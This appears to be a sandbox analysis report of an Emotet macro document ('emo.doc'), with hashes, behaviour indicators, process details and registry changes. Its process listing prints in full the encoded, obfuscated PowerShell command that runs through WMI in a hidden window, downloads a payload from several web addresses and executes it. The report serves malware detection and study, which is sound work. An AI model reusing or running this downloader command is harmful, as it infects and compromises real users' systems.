File name:

emo.doc

Full analysis: https://app.any.run/tasks/258ee773-ccf7-4e03-a3bd-dc0ecf5b284e
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: August 01, 2025, 05:48:57
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
emotet-doc
emotet
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Subject: Handmade Argentina Handcrafted Frozen Towels yellow Frozen virtual Guatemala array Lesotho JBOD, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Oct 30 23:48:00 2020, Last Saved Time/Date: Tue Nov 3 02:14:00 2020, Number of Pages: 1, Number of Words: 9339, Number of Characters: 53237, Security: 8
MD5:

3079AF4D01EE6EC51BD3D9911DA7E23F

SHA1:

3EA711D020B52FB0490C359462451D4EDD471E33

SHA256:

C578A9FC241658517A7346A2A60236C84F0BB4919B857DB226150AAB4093451E

SSDEEP:

3072:evt3BDbKRPJivKie6B/w2yiWydh+bRevf1+ll:evdlbKRPJiP/w2PCxl

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops known malicious document

      • WINWORD.EXE (PID: 4948)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1580)
  • SUSPICIOUS

    • Creates an object to access WMI (SCRIPT)

      • WINWORD.EXE (PID: 4948)
    • Executed via WMI

      • powershell.exe (PID: 1580)
    • Creates a directory (POWERSHELL)

      • powershell.exe (PID: 1580)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 1580)
  • INFO

    • Reads mouse settings

      • WINWORD.EXE (PID: 4948)
    • Reads the software policy settings

      • powershell.exe (PID: 1580)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 1580)
    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 1580)
    • Create files in a temporary directory

      • powershell.exe (PID: 1580)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 1580)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 1580)
    • Disables trace logs

      • powershell.exe (PID: 1580)
    • Checks proxy server information

      • powershell.exe (PID: 1580)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Identification: Word 8.0
LanguageCode: English (US)
DocFlags: 1Table, ExtChar
System: Windows
Word97: No
Title: -
Subject: Handmade Argentina Handcrafted Frozen Towels yellow Frozen virtual Guatemala array Lesotho JBOD
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
Software: Microsoft Office Word
CreateDate: 2020:10:30 23:48:00
ModifyDate: 2020:11:03 02:14:00
Security: Locked for annotations
CodePage: Windows Latin 1 (Western European)
Company: -
CharCountWithSpaces: 62452
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
LastPrinted: 0000:00:00 00:00:00
RevisionNumber: 1
TotalEditTime: -
Words: 9339
Characters: 53237
Pages: 1
Paragraphs: 124
Lines: 443
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
142
Monitored processes
5
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe powershell.exe no specs conhost.exe no specs ai.exe no specs slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
684C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
1580POwersheLL -windowstyle hidden -ENCOD IABTAFYAIAAgADAAegBYACAAKABbAFQAeQBQAGUAXQAoACIAewAyAH0AewAwAH0AewA0AH0AewAzAH0AewAxAH0AIgAtAGYAIAAnAGUAJwAsACcAcgBFAEMAdABvAHIAWQAnACwAJwBzAFkAcwB0ACcALAAnAC4ASQBPAC4AZABJACcALAAnAE0AJwApACAAIAApACAAOwAgACAAIABzAGUAdAAgACAAVAB4AHkAUwBlAG8AIAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADAAfQB7ADcAfQB7ADUAfQB7ADYAfQB7ADQAfQB7ADIAfQB7ADEAfQB7ADgAfQB7ADMAfQAiAC0ARgAnAFMAWQBzAFQARQAnACwAJwBUAE0AJwAsACcASQBOACcALAAnAEUAUgAnACwAJwBwAE8AJwAsACcATgBlAFQALgBzAGUAJwAsACcAUgBWAEkAQwBFACcALAAnAE0ALgAnACwAJwBBAE4AYQBHACcAKQApACAAOwAgACAAJABOAGIAZgA1AHQAZwAzAD0AKAAnAEIAOQAnACsAJwB5AHAAJwArACgAJwA5ADAAJwArACcAcwAnACkAKQA7ACQAVgB4AG4AbAByAGUAMAA9ACQAQwBsAHUAZABrAGoAeAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA2AHIAMQB0AHUAeQA7ACQASwB5ADMAcQAwAGUAOAA9ACgAKAAnAFIAcQAnACsAJwBkAHgAJwApACsAJwB3AG8AJwArACcANQAnACkAOwAgACAAKAAgACAARABpAHIAIAAgAHYAYQBSAGkAQQBiAGwAZQA6ADAAWgB4ACkALgB2AGEAbAB1AEUAOgA6ACIAQwByAGUAQQBUAGAARQBgAGQASQBSAEUAYwBgAFQAYABPAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAbgBEAHAAJwArACcASgByAGIAJwApACsAKAAnAGUAJwArACcAdgBrADQAbgAnACkAKwAnAEQAJwArACcAcAAnACsAKAAnAEMAJwArACcAYwB3AHIAXwAyAGgAJwApACsAJwBuAEQAJwArACcAcAAnACkAIAAtAFIAZQBQAGwAQQBjAEUAIAAoACcAbgAnACsAJwBEAHAAJwApACwAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQARgBOADUAZwBnAG0AcwBIACAAPQAgACgAMQA4ADIALAAxADgANwAsADIAMgA5ACwAMQA0ADYALAAyADMAMQAsADEANwA3ACwAMQA1ADEALAAxADQAOQAsADEANgA2ACkAOwAkAFAAeQBvAHoAZwBlAG8APQAoACgAJwBKADUAZgAnACsAJwB5ADEAJwApACsAJwBjACcAKwAnAGMAJwApADsAIAAoACAAIAB2AGEAUgBpAEEAQgBMAEUAIABUAHgAWQBTAEUAbwAgACAAKQAuAFYAYQBsAHUARQA6ADoAIgBTAGUAYwBVAHIASQBgAFQAWQBwAGAAUgBgAE8AdABPAGMAYABvAGwAIgAgAD0AIAAoACgAJwBUAGwAJwArACcAcwAxACcAKQArACcAMgAnACkAOwAkAEYATgA1AGcAZwBtAHMASAAgACsAPQAgACgAMQA4ADYALAAxADQAMQAsADIAMgA4ACwAMQA4ADIALAAxADcANwAsADEANwAxACwAMgAyADkALAAyADMANgAsADIAMwA5ACwAMgAzADkALAAyADMAOQAsADIAMgA4ACwAMQA4ADEALAAxADgAMgAsADEANwAxACwAMgAyADkALAAyADMANAAsADIAMwA5ACwAMgAzADkALAAyADIAOAApADsAJABIAHUAYQBqAGcAYgAwAD0AKAAoACcASgBuACcAKwAnAG8AJwApACsAJwA1AGcAJwArACcAYQAxACcAKQA7ACQAQgBiADIAOAB1AG0AbwAgAD0AIAAoACgAJwBBAGwAZQAnACsAJwA3AGcAJwApACsAJwBfADgAJwApADsAJABIAHMAYwBlAF8AagBzAD0AKAAnAEsAdgAnACsAKAAnAG4AYgAnACsAJwBvAHYAXwAnACkAKQA7ACQAUwBwAGsANQAxAHUAZQA9ACgAKAAnAEMAJwArACcANwB4AG8AJwApACsAJwA5AGcAJwArACcAbAAnACkAOwAkAFMAYwB1AHMAYgBrAGoAPQAkAEgATwBNAEUAKwAoACgAJwA1ACcAKwAnAHQAJwArACgAJwBmACcAKwAnAEoAcgBiAGUAdgAnACsAJwBrACcAKQArACgAJwA0ADUAdABmACcAKwAnAEMAYwAnACsAJwB3ACcAKQArACcAcgAnACsAKAAnAF8AMgBoACcAKwAnADUAdABmACcAKQApACAALQByAEUAcABsAEEAQwBFACAAIAAoAFsAQwBoAEEAUgBdADUAMwArAFsAQwBoAEEAUgBdADEAMQA2ACsAWwBDAGgAQQBSAF0AMQAwADIAKQAsAFsAQwBoAEEAUgBdADkAMgApACsAJABCAGIAMgA4AHUAbQBvACsAKAAoACcALgBlACcAKwAnAHgAJwApACsAJwBlACcAKQA7ACQARgBOADUAZwBnAG0AcwBIACAAKwA9ACAAKAAxADgANQAsADEANwA5ACwAMQA5ADAALAAxADgANAAsADIAMgA5ACwAMQA1ADEALAAxADMAOQAsADEANQA3ACwAMQA2ADQALAAyADMANQAsADEANwA3ACwAMgAzADkALAAxADcAMQAsADEAOAAzACwAMgAzADYALAAxADQAMQAsADEAMgA4ACwAMQA4ADcALAAyADMANQAsADEAMwA0ACwAMQAyADgALAAxADUAOAAsADEANwA3ACwAMQA3ADYALAAxADMAOQApADsAJABoAGIAbQBzAGsAVgAyAFQAPQAoACgAJwBDACcAKwAnADcAeABvACcAKQArACcAOQBnACcAKwAnAGwAJwApADsAJABoAGIAbQBzAGsAVgAyAFQAPQAkAEgATwBNAEUAKwAoACgAJwA1ACcAKwAnAHQAJwArACgAJwBmACcAKwAnAEoAcgBiAGUAdgAnACsAJwBrACcAKQArACgAJwA0ADUAdABmACcAKwAnAEMAYwAnACsAJwB3ACcAKQArACcAcgAnACsAKAAnAF8AMgBoACcAKwAnADUAdABmACcAKQApACAALQByAEUAcABsAEEAQwBFACAAIAAoAFsAQwBoAEEAUgBdADUAMwArAFsAQwBoAEEAUgBdADEAMQA2ACsAWwBDAGgAQQBSAF0AMQAwADIAKQAsAFsAQwBoAEEAUgBdADkAMgApACsAJABCAGIAMgA4AHUAbQBvACsAKAAoACcALgBjACcAKwAnAG8AJwApACsAJwBuAGYAJwApADsAJABRADEAXwB5ADAANQBfAD0AKAAnAFcAJwArACgAJwA0ACcAKwAnAHEAdgB5ACcAKQArACcAegA4ACcAKQA7ACQATwBkAGIAMwBoAGYAMwA9ACYAKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAZQBjAHQAJwApACAATgBlAHQALgBXAEUAQgBjAGwASQBFAE4AdAA7ACQARgBOADUAZwBnAG0AcwBIACAAKwA9ACAAKAAxADgAMwAsADEANQA0ACwAMQA3ADMALAAxADIAOAAsADEANwA1ACwAMQA1ADEALAAyADMAOAAsADEANAAwACwAMQA4ADMALAAxADYAMgAsADIAMgA4ACwAMQA3ADAALAAxADcAMwAsADEANwA5ACwAMgAyADkAKQA7ACQAQQBuAGIAeQB0ADEAeQA9ACgAJwBoACcAKwAoACcAdAB0AHAAOgAnACsAJwBdAFsAJwArACcAKABzACkAXQAnACkAKwAoACgAJwB3AF0AJwArACcAWwAoACcAKQApACsAKAAoACcAcwApACcAKwAnAF0AdwAnACkAKQArACgAJwBkAGEAJwArACcALQAnACkAKwAnAGkAJwArACcAbgAnACsAJwBkAHUAJwArACgAJwBzACcAKwAnAHQAcgBpAGEAbAAuACcAKwAnAGgAJwArACcAdAAnACkAKwAnAGIAXQAnACsAKAAnAFsAKABzACkAXQAnACsAJwB3ACcAKwAnAGoAcwAnACkAKwAoACgAJwBdACcAKwAnAFsAKAAnACkAKQArACgAKAAnAHMAJwArACcAKQBdAHcAOQBJAGQATAAnACsAJwBQAF0AWwAnACsAJwAoAHMAJwArACcAKQBdAHcAJwArACcAQABoACcAKQApACsAKAAnAHQAJwArACcAdABwADoAXQAnACkAKwAoACcAWwAoAHMAJwArACcAKQBdACcAKQArACcAdwAnACsAKAAnAF0AJwArACcAWwAoAHMAKQBdACcAKQArACgAJwB3AGQAYQBwACcAKwAnAHIAbwAnACsAJwBmAGUAcwBpAG8AbgBhACcAKwAnAGwALgBoACcAKQArACcAdABiACcAKwAoACcAXQBbACgAcwAnACsAJwApACcAKwAnAF0AJwApACsAJwB3ACcAKwAoACcAZAAnACsAJwBhAHQAYQAnACkAKwAoACcANABdAFsAKABzACcAKwAnACkAXQB3AGgAJwApACsAKAAnAFcAZwBXACcAKwAnAGoAVAAnACkAKwAoACcAVgBdACcAKwAnAFsAJwApACsAKAAnACgAcwApAF0AdwBAAGgAdAB0AHAAJwArACcAcwA6AF0AWwAoAHMAJwArACcAKQBdACcAKwAnAHcAJwArACcAXQAnACkAKwAnAFsAJwArACgAJwAoAHMAKQAnACsAJwBdAHcAZABhAGcAJwArACcAcgBhACcAKQArACcAbgBpACcAKwAnAHQAJwArACgAJwBlAGcAJwArACcAaQBhACcAKQArACgAJwByAGUALgBoACcAKwAnAHQAJwApACsAJwBiAF0AJwArACgAJwBbACcAKwAnACgAcwApACcAKQArACgAJwBdAHcAdwAnACsAJwBwAC0AYQAnACsAJwBkAG0AJwArACcAaQBuAF0AWwAoAHMAKQAnACsAJwBdAHcAdAAnACkAKwAoACcAVgBdAFsAJwArACcAKABzACcAKwAnACkAJwApACsAKAAnAF0AdwBAACcAKwAnAGgAJwApACsAJwB0AHQAJwArACcAcAAnACsAKAAnADoAJwArACcAXQBbACcAKQArACgAJwAoAHMAKQBdAHcAXQBbACcAKwAnACgAcwAnACsAJwApAF0AdwB3AHcAJwArACcAdwAnACsAJwAuAG8AdQB0ACcAKwAnAHMAJwArACcAcAAnACkAKwAoACcAbwBrACcAKwAnAGUAJwApACsAJwBuAHYAJwArACcAaQAnACsAKAAnAHMAJwArACcAaQBvAG4AcwAuACcAKQArACgAJwBoAHQAYgAnACsAJwBdACcAKQArACcAWwAnACsAKAAnACgAcwApAF0AdwAnACsAJwB3AHAAJwArACcALQBpAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAJwApACsAKAAnAGUAcwBdAFsAKABzACkAJwArACcAXQB3AGEAVwAnACsAJwBvACcAKwAnAE0AJwApACsAKAAnAF0AJwArACcAWwAoACcAKwAnAHMAKQBdAHcAJwApACsAKAAnAEAAJwArACcAaAB0AHQAcAA6AF0AJwApACsAKAAnAFsAKABzACkAJwArACcAXQB3AF0AWwAoACcAKwAnAHMAKQAnACkAKwAoACcAXQB3AG0AbwAnACsAJwBiAHMAJwApACsAKAAnAG8AJwArACcAdQBrAC4AaAAnACkAKwAoACgAJwB0ACcAKwAnAGIAXQBbACgAJwApACkAKwAoACgAJwBzACkAJwArACcAXQB3AHcAcAAtACcAKQApACsAJwBpAG4AJwArACcAYwAnACsAJwBsACcAKwAoACcAdQBkAGUAJwArACcAcwBdACcAKwAnAFsAJwApACsAKAAnACgAcwApAF0AJwArACcAdwAnACkAKwAoACcAVQBZACcAKwAnADMAMABSAF0AJwApACsAKAAnAFsAKABzACcAKwAnACkAXQB3ACcAKwAnAEAAJwArACcAaAAnACsAJwB0AHQAcAA6AF0AWwAnACkAKwAoACcAKAAnACsAJwBzACkAXQB3ACcAKQArACgAJwBdAFsAJwArACcAKABzACkAJwApACsAKAAnAF0AJwArACcAdwBiACcAKQArACcAaQAnACsAKAAnAGcAJwArACcAbABhAHUAZwBoACcAKwAnAHMAJwApACsAKAAoACcALgBoACcAKwAnAHQAJwArACcAYgBdAFsAKABzACcAKQApACsAKAAoACcAKQBdACcAKQApACsAKAAnAHcAcwAnACsAJwBtAGEAbABsAHAAbwB0ACcAKwAnAGEAdABvACcAKQArACcAZQBzACcAKwAoACgAJwBdACcAKwAnAFsAKABzACcAKQApACsAKAAoACcAKQBdAHcAWQBdACcAKwAnAFsAKABzACcAKwAnACkAXQB3ACcAKwAnAEAAaAAnACsAJwB0AHQAcABzADoAXQBbACgAcwApACcAKQApACsAJwBdAHcAJwArACgAJwBdAFsAKAAnACsAJwBzACkAXQB3AG4AJwArACcAZwAnACkAKwAoACcAbABsACcAKwAnAG8AJwApACsAKAAnAGcAaQBzAHQAJwArACcAaQAnACkAKwAoACcAYwBzAC4AJwArACcAaAAnACkAKwAnAHQAJwArACgAJwBiAF0AJwArACcAWwAnACsAJwAoACcAKwAnAHMAKQBdAHcAJwApACsAJwBhAGQAJwArACgAJwBtAGkAJwArACcAbgAnACkAKwAnAGUAcgAnACsAJwBdACcAKwAoACcAWwAoAHMAJwArACcAKQBdAHcAJwArACcAVwAzAG0AJwApACsAJwBrACcAKwAoACgAJwBCACcAKwAnAF0AWwAoAHMAJwApACkAKwAoACgAJwApACcAKwAnAF0AdwAnACkAKQApAC4AIgByAGUAcABgAEwAQQBjAEUAIgAoACgAJwBdACcAKwAnAFsAJwArACgAJwAoAHMAKQBdACcAKwAnAHcAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAHgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAHMAUABgAGwASQBUACIAKAAkAEkAdgBnADMAegBjAHUAIAArACAAJABWAHgAbgBsAHIAZQAwACAAKwAgACQASgB6AGEAZQB3AGQAeQApADsAJABHAGMAbwB5AHYAbAB2AD0AKAAoACcASwBmACcAKwAnAF8AJwApACsAKAAnADkAJwArACcAZQB0ADEAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEEAOABpADMAawBlADEAIABpAG4AIAAkAEEAbgBiAHkAdAAxAHkAKQB7AHQAcgB5AHsAJABPAGQAYgAzAGgAZgAzAC4AIgBkAE8AYABXAG4ATABPAEEAYABkAGYASQBMAGUAIgAoACQAQQA4AGkAMwBrAGUAMQAsACAAJABTAGMAdQBzAGIAawBqACkAOwAkAFoAaABjAG4AYQB1AHgAPQAoACgAJwBFAGsAJwArACcAawAnACkAKwAoACcAagAnACsAJwA0ADcAdAAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABTAGMAdQBzAGIAawBqACkALgAiAEwARQBuAGAARwBUAGgAIgAgAC0AZwBlACAANAA1ADEAOQA5ACkAIAB7ACQAewBBADgAYABJAGAAMwBLAEUAMQB9AC4AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAJwBhAHkAJwAsACcAVABvAEMAaABhACcALAAnAHIAQQByAHIAJwApAC4ASQBuAHYAbwBrAGUAKAApACAAfAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9AHsAMwB9ACIAIAAtAGYAJwAtACcALAAnAGEAYwBoACcALAAnAEYAbwByAEUAJwAsACcATwBiAGoAZQBjAHQAJwApACAALQBwAHIAbwBjAGUAcwBzACAAewAgACQAewBGAE4ANQBgAEcARwBtAGAAUwBoAH0AIAArAD0AIAAoAFsAYgB5AHQAZQBdAFsAYwBoAGEAcgBdACQAewBfAH0AIAAtAGIAeABvAHIAIAAwAHgAZABmACAAKQAgAH0AOwAgACQARgBOADUAZwBnAG0AcwBIACAAKwA9ACAAKAAyADIAOAApADsAIAAkAGIAMABSAGoAZQAgAD0AIAAgAFsAdAB5AHAAZQBdACgAIgB7ADEAfQB7ADAAfQAiACAALQBGACcAVgBlAHIAVAAnACwAJwBDAG8AbgAnACkAOwAgACAAIAAkAEIAMABSAGoARQA6ADoAIgB0AE8AYABCAGEAUwBgAEUANgA0AFMAYABUAFIASQBgAE4AZwAiACgAJAB7AGYAbgA1AGAAZwBnAG0AYABzAGgAfQApACAAfAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAGkAbABlACcALAAnAHUAdAAtAGYAJwAsACcAbwAnACkAIAAkAHsAaABCAGAAbQBTAEsAYABWADIAVAB9ADsAIAAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAoACcAdwBpACcAKwAnAG4AJwApACsAKAAnADMAMgBfACcAKwAnAFAAcgBvAGMAJwArACcAZQAnACkAKwAnAHMAJwArACcAcwAnACkAKQAuACIAYwBSAGAAZQBhAFQARQAiACgAJABTAGMAdQBzAGIAawBqACkAOwAkAEcAbAB3AGsAaQA2AGEAPQAoACcASQAnACsAJwBtACcAKwAoACcAdABkACcAKwAnAHgAdgA2ACcAKQApADsAYgByAGUAYQBrADsAJABQAGYAcABiAGwAaAAxAD0AKAAnAFYAcwAnACsAKAAnAGwAYQBsACcAKwAnAGMAJwApACsAJwB1ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARgA0ADcAaQBlAGYAMgA9ACgAKAAnAEIAbgAnACsAJwB6AGkAZAAnACkAKwAnAHIAdAAnACkA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
4680\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4948"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n C:\Users\admin\AppData\Local\Temp\emo.doc /o ""C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
6748"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "775FAD33-D3B5-4921-BDAD-76523F9E5627" "A3102E7C-A024-47B4-81C2-43DAC87FC074" "4948"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64.
Version:
0.12.2.0
Modules
Images
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\ai.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\program files\common files\microsoft shared\clicktorun\c2r64.dll
Total events
19 413
Read events
19 063
Write events
329
Delete events
21

Modification events

(PID) Process:(4948) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common
Operation:writeName:SessionId
Value:
8885804E907EBC4D9E009162EA2769F7
(PID) Process:(4948) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\GracefulExit\WINWORD\2200
Operation:delete valueName:0
Value:
ซ鴐㝅娴Ꝇ힬꿹�䙔�닜樁င$驄摽鶲…ީ湕湫睯쥮Ȇ∢්ł¢ᣂ숁씀褎예됏죃캲ǭ჉砃㐶ᇅᆘዒ看椀渀眀漀爀搀⸀攀砀攀씀‖ៅ肀줄࠘㈲㈱䐭捥
(PID) Process:(4948) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\GracefulExit\WINWORD\2200
Operation:delete keyName:(default)
Value:
(PID) Process:(4948) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\4948
Operation:writeName:0
Value:
0B0E10BA7BD9CC831A404E96441797D7B6744A230046D09780E6FFD480EE016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C50E8908C91003783634C511D426D2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(4948) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems
Operation:writeName:v+4
Value:
762B34005413000004000000000000005950F9FCA702DC018C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(4948) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming
Operation:writeName:RoamingConfigurableSettings
Value:
DC00000000000000803A0900E907080005000100050031000400FB00000000000000000000000000201C0000201C00008051010080510100805101008051010080F4030080F4030080F403002C01000084030000805101000000000084030000805101000A0000001E0000001E000000000000000000000080510100010000000100000000000000000000000000000000000000008D2700008D2700008D2700010000000A000000805101000000300000003000000030000000000084030000805101001E0000008403000080510100050000000500000005000000
(PID) Process:(4948) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\4948
Operation:writeName:0
Value:
0B0E10BA7BD9CC831A404E96441797D7B6744A230046D09780E6FFD480EE016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DA201C2190000C50E8908C91003783634C511D426D2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(4948) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems
Operation:writeName:s,4
Value:
732C3400541300000200000000000000295B0CFDA702DC01A000000001000000740000002000000063003A005C00700072006F006700720061006D002000660069006C00650073005C006D006900630072006F0073006F006600740020006F00660066006900630065005C0072006F006F0074005C006F0066006600690063006500310036005C00670065006E006B006F002E0064006C006C000000670065006E006B006F002E0063006F006E006E00650063007400310032000000
(PID) Process:(4948) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
Operation:writeName:1.2
Value:
34373A38363637372C502D582D313130373037302D322D332C502D582D313038333432372D322D352C502D582D313034313336382D332D31302C502D582D313034323339332D332D372C502D582D313032343737362D322D372C502D582D313032343034372D312D362C502D582D313030303332322D312D372C502D522D36353031312D312D332C502D522D35303534312D322D372C66366562623730383A3433343833322C6A683861623434373A3338303633332C65386A69683932303A3434323136302C6C697374656E696E676F6E6465766963653A3332343439342C61686938323431313A3434323139322C38356863643939303A3432353033352C73683335303A3332393432382C502D582D37313536382D312D352C502D522D36393233322D33382D31322C502D522D32363434322D312D382C502D522D32333638312D322D372C502D442D33323530322D322D332C502D442D33323530312D322D332C502D442D33323431352D322D332C7461656E613537363A39303236352C502D582D313032373136332D322D31312C502D582D313033383432302D322D352C502D582D3130393636322D312D31372C502D582D3130373131392D312D332C502D582D38303033382D312D352C502D522D36343531332D31382D31312C502D522D35313931362D38342D33312C502D442D313136303234302D312D362C502D442D313136303134312D312D342C6F74656C657564623A3332363832362C38686262343533383A3338363637302C74656172693335323A3233333737342C74657072693632383A3433393731302C74656576653835303A3132303534302C502D522D313631363239302D312D332C502D522D313538353838372D342D362C502D522D313535313135332D312D332C502D522D313233363935332D31312D31352C502D522D313036333231302D372D31332C502D522D313534373631372D312D332C502D522D313532363837352D31352D332C502D522D313532363837342D31352D332C502D522D313532363837332D31352D332C502D522D313532363837322D31352D332C502D522D313532363837302D31352D332C502D522D313532363836392D31352D332C502D522D313532363836382D31352D332C502D522D313532363836372D31352D332C502D522D313532363836362D31352D332C502D522D313532363836322D31352D332C502D522D313437393637342D332D352C502D522D33383234382D32322D32382C502D522D313431373335342D332D352C502D522D313431373335322D332D352C502D522D313431363735332D372D392C502D522D313431363734362D362D382C502D522D313431353138332D33322D342C502D522D313431353138322D33322D342C502D522D313431353138312D33322D342C502D522D313431353138302D33322D342C502D522D313431353137392D33322D342C502D522D313238303138362D312D332C502D522D313236373038342D322D362C502D522D313236313931382D322D342C502D522D313234353830342D34382D352C502D522D313234353239362D342D362C502D522D313138333633392D36322D362C502D522D313138333633312D36322D362C502D522D313138333632382D36322D362C502D522D313135373537302D322D3